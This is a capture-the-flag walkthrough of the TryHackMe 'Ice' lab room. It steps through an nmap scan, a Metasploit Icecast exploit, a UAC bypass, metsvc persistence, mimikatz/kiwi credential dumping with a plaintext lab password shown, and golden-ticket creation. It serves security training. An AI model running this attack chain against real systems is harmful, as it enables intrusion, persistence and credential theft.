CTF Walk Through | HackProof Academy | [email protected]

2 subscriber(s)


05/12/2024 Shad Hussain Knowledge Views 189 Comments 0 Analytics Video English DMCA Add Favorite Copy Link
CTF Walk Through - Ice - THM

Room Link : https://tryhackme.com/r/room/ice STEP1 nmap -Pn -sSV 10.10.98.252 FINDING PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP) 3389/tcp open tcpwrapped 5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 8000/tcp open http Icecast streaming media server 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49158/tcp open msrpc Microsoft Windows RPC 49159/tcp open msrpc Microsoft Windows RPC 49160/tcp open msrpc Microsoft Windows RPC Service Info: Host: DARK-PC; OS: Windows; CPE: cpe:/o:microsoft:windows ------------------------------------------------------------------------------------------------------- STEP2 msfconsole -q search icecast use exploit(windows/http/icecast_header) set options and exploit bg the session ------------------------------------------------------------------------------------------------------- STEP3 search exploit suggester use post(multi/recon/local_exploit_suggester) set SESSION and run ------------------------------------------------------------------------------------------------------- STEP4 USE exploit/windows/local/bypassuac_eventvwr set SESSION set LHOST run ------------------------------------------------------------------------------------------------------- STEP5 sessions -i 2 getprivs SeTakeOwnershipPrivilege -- do nothing ps -- to check processing running migrate process id to merge with malicious exploit shell whoami nt authority\system -- we are root or admin of the machine ------------------------------------------------------------------------------------------------------- STEP6 (OPTIONS) in meterpreter run metsvc -A -- to keep the persistence even after restart the machine ------------------------------------------------------------------------------------------------------- STEP7 in meterpreter load kiwi -- is advance version of mimikatz -- it will also expland help menu creds_all -- to get all the users and password FINDING Username Domain Password -------- ------ -------- (null) (null) (null) DARK-PC$ WORKGROUP (null) Dark Dark-PC Password01! tspkg credentials ================= Username Domain Password -------- ------ -------- Dark Dark-PC Password01! kerberos credentials ==================== Username Domain Password -------- ------ -------- (null) (null) (null) Dark Dark-PC Password01! dark-pc$ WORKGROUP (null) ------------------------------------------------------------------------------------------------------- STEP8 in meterpreter golden_ticket_create -- allowing us to authenticate anywhere with ease dir *.txt /s -- search al .txt files dir flag* /s /p -- search flag.txt file dir /s /b flag.txt -------------------------------------------------------------------------------------------------------

Related articles

 WhatsApp no. else use your mail id to get the otp...!    Please tick to get otp in your mail id...!
 





© mutebreak.com | All Rights Reserved